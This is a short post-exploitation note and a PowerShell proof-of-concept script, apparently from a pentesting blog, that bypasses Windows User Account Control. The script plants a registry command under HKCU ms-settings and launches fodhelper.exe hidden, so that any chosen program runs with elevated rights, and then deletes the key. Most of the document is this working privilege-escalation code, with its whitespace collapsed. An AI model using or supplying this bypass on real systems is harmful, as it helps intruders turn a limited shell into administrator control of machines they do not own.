You might pop a shell on a domain user account that is an Administrator on the local computer but since it's just an interactive shell you can't run anything with the Administrator tokens/privileges because of UAC
<#.SYNOPSIS This script is a proof of concept to bypass the User Access Control (UAC) via fodhelper.exe It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform an UAC bypass to start any application. ATTENTION: Do not try this on your productive machine! .NOTES Function : FodhelperBypass File Name : FodhelperBypass.ps1 Author : Christian B. - winscripting.blog .LINK https://github.com/winscripting/UAC-bypass.EXAMPLE Load "cmd.exe /c powershell.exe" (it's default): FodhelperBypass Load specific application: FodhelperBypass -program "cmd.exe" FodhelperBypass -program "cmd.exe /c powershell.exe"#>functionFodhelperBypass(){Param([String]$program="cmd /c start powershell.exe"#default)#Create registry structureNew-Item"HKCU:\Software\Classes\ms-settings\Shell\Open\command"-ForceNew-ItemProperty-Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"-Name "DelegateExecute"-Value ""-ForceSet-ItemProperty-Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"-Name "(default)"-Value $program-Force#Perform the bypassStart-Process"C:\Windows\System32\fodhelper.exe"-WindowStyle Hidden#Remove registry structureStart-Sleep3Remove-Item"HKCU:\Software\Classes\ms-settings\"-Recurse -Force}
